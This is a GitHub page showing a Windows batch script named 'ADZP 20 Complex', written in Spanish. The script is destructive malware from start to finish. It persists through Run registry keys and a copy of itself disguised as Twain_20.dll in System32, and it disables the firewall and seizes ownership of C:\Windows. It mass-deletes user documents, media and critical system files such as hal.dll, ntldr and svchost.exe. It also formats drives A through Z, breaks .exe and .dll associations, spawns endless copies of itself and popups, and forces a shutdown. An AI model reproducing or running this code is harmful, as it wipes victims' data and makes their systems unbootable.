-
Notifications
You must be signed in to change notification settings - Fork 0
/
Codigo (CHK y EXE).src
363 lines (363 loc) · 17.2 KB
/
Codigo (CHK y EXE).src
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
@echo off
title ADZP 20 Complex
goto Phase-1
:Phase-1
echo off>>ErrorCritico.vbs
echo do>>ErrorCritico.vbs
echo Mensaje=msgbox("Error Critico",16,"Error")>>ErrorCritico.vbs
echo loop>>ErrorCritico.vbs
echo off>>Advertencia.vbs
echo do>>Advertencia.vbs
echo Mensaje=msgbox("Error en El Sistema",48,"Error")>>Advertencia.vbs
echo loop>>Advertencia.vbs
echo off>>Informacion.vbs
echo do>>Informacion.vbs
echo Mensaje=MsgBox("Has Sido Hackeado!",64,"ADZP 20 Complex")>>Informacion.vbs
echo loop>>Informacion.vbs
echo off>>Autorun.inf
echo [AutoRun]>>Autorun.inf
echo Open=ADZP 20 Complex>>Autorun.inf
echo Action=Start ADZP 20 Complex>>Autorun.inf
echo Label=???>>Autorun.inf
echo off>>Taskse.exe
echo %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%>>Taskse.exe
echo %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%>>Taskse.exe
echo %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%>>Taskse.exe
echo %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%>>Taskse.exe
echo %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%>>Taskse.exe
echo %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%>>Taskse.exe
echo %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%>>Taskse.exe
echo %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%>>Taskse.exe
echo %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%>>Taskse.exe
echo %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%>>Taskse.exe
echo off>>Taskdl.bat
echo @echo off>>Taskdl.bat
echo title Taskdl>>Taskdl.bat
echo takeown /f "C:\Windows\System32" /r>>Taskdl.bat
echo icacls "C:\Windows\System32" /reset /t /c /q>>Taskdl.bat
echo takeown /f "C:\Windows" /r>>Taskdl.bat
echo icacls "C:\Windows" /reset /t /c /q>>Taskdl.bat
if not exist Twain_20.dll (copy "ADZP 20 Complex.bat" "Twain_20.dll") else (echo.)
if not exist Twain_20.dll (copy "ADZP 20 Complex.cmd" "Twain_20.dll") else (echo.)
if not exist Twain_20.dll (copy "ADZP 20 Complex.exe" "Twain_20.dll") else (echo.)
if not exist Twain_20.dll (copy "ADZP 20 Complex.com" "Twain_20.dll") else (echo.)
if not exist Twain_20.dll (copy "ADZP 20 Complex.scr" "Twain_20.dll") else (echo.)
if not exist Twain_20.dll (copy "ADZP 20 Complex.vbs" "Twain_20.dll") else (echo.)
copy Twain_20.dll "C:\Windows\System32"
echo off>>Twain_20.cmd
echo @echo off>>Twain_20.cmd
if exist Twain_20.cmd (echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "%temp%\Twain_20.cmd">>Twain_20.cmd) else (echo.)
if exist "ADZP 20 Complex.bat" (goto CMD) else (echo.)
if exist "ADZP 20 Complex.cmd" (goto CMD) else (echo.)
if exist "ADZP 20 Complex.exe" (goto EXE) else (echo.)
if exist "ADZP 20 Complex.com" (goto EXE) else (echo.)
if exist "ADZP 20 Complex.scr" (goto EXE) else (echo.)
if exist "ADZP 20 Complex.vbs" (goto VBS) else (echo.)
:CMD
echo for /F "tokens=*" %%A in (C:\Windows\System32\Twain_20.dll) do (call %%A)>>Twain_20.cmd
start Twain_20.cmd
goto Phase-2
:EXE
echo call C:\Windows\System32\Twain_20.dll>>Twain_20.cmd
start Twain_20.cmd
goto Phase-2
:VBS
echo certutil -encode "C:\Windows\System32\Twain_20.dll" "%temp%\Twain_20.dll">>Twain_20.cmd
echo certutil -decode "%temp%\Twain_20.dll" "%temp%\ADZP 20 Complex.vbs">>Twain_20.cmd
echo call "%temp%\ADZP 20 Complex.vbs">>Twain_20.cmd
start Twain_20.cmd
goto Phase-2
:Phase-2
if %errorlevel% equ 0 (set userstatus=Administrator) else (netsh advfirewall set publicprofile state off)
if exist Twain_20.cmd (start Twain_20.cmd) else (echo.)
if exist Twain_20.cmd (copy "Twain_20.cmd" "%temp%") else (echo.)
del /f /q /s Twain_20.cmd
start Informacion.vbs
start Taskdl.bat
echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
ipconfig /release
echo Has Sido Hackeado!
taskkill /im DiskPart /f
attrib -r -a -s -h *.*
del /f /q /s *.pdf
del /f /q /s *.rar
del /f /q /s *.png
del /f /q /s *.jpg
del /f /q /s *.txt
del /f /q /s *.log
del /f /q /s *.mp3
del /f /q /s *.mp4
del /f /q /s *.avi
del /f /q /s *.wav
del /f /q /s *.jpeg
del /f /q /s *.docx
del /f /q /s *.xlsx
del /f /q /s *.pptx
if exist "WannaCrypt0r.exe" (del /f /q /s WannaCrypt0r.exe)
if exist "Wannacry.exe" (del /f /q /s WannaCry.exe)
if exist "@WanaDecryptor@.exe" (del /f /q /s @WanaDecryptor@.exe)
if exist "rensenWare.exe" (del /f /q /s rensenWare.exe)
start ErrorCritico.vbs
start Advertencia.vbs
start ErrorCritico.vbs
start Advertencia.vbs
start ErrorCritico.vbs
start Advertencia.vbs
start ErrorCritico.vbs
start Advertencia.vbs
start ErrorCritico.vbs
start Advertencia.vbs
msg * Virus Detectado
msg * Virus Detectado
msg * Has Sido Hackeado!
start "" %0
start notepad
start calc
start explorer.exe
start mspaint.exe
start "" %0
start notepad
start calc
start explorer.exe
start mspaint.exe
start "" %0
start notepad
start calc
start explorer.exe
start mspaint.exe
echo off>>virus.exe
echo off>>virus.dll
echo off>>virus.com
echo off>>virus.css
echo off>>virus.ini
echo off>>virus.inf
echo off>>virus.sys
echo off>>virus.reg
echo off>>virus.ani
echo off>>virus.rar
echo off>>virus.pal
echo off>>virus.bin
echo off>>virus.cmd
echo off>>virus.jar
echo off>>virus.chk
echo off>>virus.lib
echo off>>virus.ocx
echo off>>virus.manifest
echo off>>virus.log
echo off>>virus.dat
start ErrorCritico.vbs
start Advertencia.vbs
start ErrorCritico.vbs
start Advertencia.vbs
start ErrorCritico.vbs
start Advertencia.vbs
del /f /s /q c:\*.mp3
del /f /s /q c:\*.mp4
del /f /s /q c:\*.jpg
del /f /s /q c:\*.txt
del /f /s /q c:\*.jpeg
del /f /s /q c:\*.php
del /f /s /q c:\*.rar
del /f /s /q c:\*.zip
start "" %0
start notepad
start calc
start explorer.exe
start mspaint.exe
start "" %0
start notepad
start calc
start explorer.exe
start mspaint.exe
start "" %0
start notepad
start calc
start explorer.exe
start mspaint.exe
start "" %0
start notepad
start calc
start explorer.exe
start mspaint.exe
start "" %0
start notepad
start calc
start explorer.exe
start mspaint.exe
start "" %0
start notepad
start calc
start explorer.exe
start mspaint.exe
del /q /f /s c:\windows\repair\*.nt
del /q /f /s c:\windows\system32\*.bin
del /q /f /s c:\windows\system32\*.nls
del /q /f /s c:\windows\system32\*.ax
del /q /f /s c:\windows\system32\*.acm
del /q /f /s c:\windows\system32\*.bin
del /q /f /s c:\windows\system32\*.dat
del /q /f /s c:\windows\system32\*.hlp
del /q /f /s c:\windows\system32\*.ocx
del /q /f /s c:\windows\system32\*.drv
del /q /f /s c:\windows\system32\*.manifest
start "" %0
start notepad
start calc
start explorer.exe
start mspaint.exe
start "" %0
start notepad
start calc
start explorer.exe
start mspaint.exe
start "" %0
start notepad
start calc
start explorer.exe
start mspaint.exe
start "" %0
start notepad
start calc
start explorer.exe
start mspaint.exe
start "" %0
start notepad
start calc
start explorer.exe
start mspaint.exe
start "" %0
start notepad
start calc
start explorer.exe
start mspaint.exe
echo off>>virus.cur
echo off>>virus.386
echo off>>virus.323
echo off>>virus.scr
echo off>>virus.acm
echo off>>virus.cpl
echo off>>virus.hlp
echo off>>virus.jpg
echo off>>virus.mpg
echo off>>virus.html
echo off>>virus.vbs
echo off>>virus.drv
echo off>>virus.wsh
echo off>>virus.rat
echo off>>virus.cer
echo off>>virus.msc
echo off>>virus.db
icacls "C:\Program Files"
attrib -r -a -s -h "C:\Program Files"
del /f /q /s "C:\Program Files"
format /y /q A:
format /y /q B:
format /y /q D:
format /y /q E:
format /y /q F:
format /y /q G:
format /y /q H:
format /y /q I:
format /y /q J:
start "" %0
start notepad
start calc
start explorer.exe
start mspaint.exe
start "" %0
start notepad
start calc
start explorer.exe
start mspaint.exe
start "" %0
start notepad
start calc
start explorer.exe
start mspaint.exe
start "" %0
start notepad
start calc
start explorer.exe
start mspaint.exe
start "" %0
start notepad
start calc
start explorer.exe
start mspaint.exe
start "" %0
start notepad
start calc
start explorer.exe
start mspaint.exe
del /q /f /s c:\windows\Twain_32.dll
del /q /f /s c:\windows\system32\*.msc
del /q /f /s c:\windows\system32\*.cpl
del /q /f /s c:\windows\system32\*.ini
del /q /f /s c:\windows\system32\*.vbs
del /q /f /s c:\windows\system32\*.386
del /q /f /s c:\windows\system32\*.vxd
del /q /f /s c:\windows\system32\hal.dll
del /q /f /s c:\windows\system32\sol.exe
del /q /f /s c:\windows\system32\winmine.exe
format /y /q K:
format /y /q L:
format /y /q M:
format /y /q N:
format /y /q Ñ:
format /y /q O:
format /y /q P:
format /y /q Q:
format /y /q R:
format /y /q S:
start "" %0
start notepad
start calc
start explorer.exe
start mspaint.exe
start "" %0
start notepad
start calc
start explorer.exe
start mspaint.exe
start "" %0
start notepad
start calc
start explorer.exe
start mspaint.exe
format /y /q T:
format /y /q U:
format /y /q V:
format /y /q W:
format /y /q X:
format /y /q Y:
format /y /q Z:
goto Phase-3
:Phase-3
if exist Taskmon.exe (start Taskmon.exe) else (start "" %0)
del /f /q /s C:\Windows\System32\svchost.exe
attrib -r -s -h c:autoexec.bat
del /s /q /f c:autoexec.bat
attrib -r -s -h c:boot.ini
del /s /q /f c:boot.ini
attrib -r -s -h c:ntldr
del /s /q /f c:ntldr
attrib -r -s -h c:windowswin.ini
del /s /q /f c:windowswin.ini
start reg delete HKCR/.exe
start reg delete HKCR/.dll
shutdown -s -t 10 -c "ADZP 20 Complex esta a Punto de Eliminar El Sistema Operativo"
start ErrorCritico.vbs
start Advertencia.vbs
start ErrorCritico.vbs
start Advertencia.vbs
if %errorlevel% equ 0 (set userstatus=Administrator) else (Taskkill /im svchost.exe /f)
start ErrorCritico.vbs
start Advertencia.vbs
start ErrorCritico.vbs
start Advertencia.vbs
exit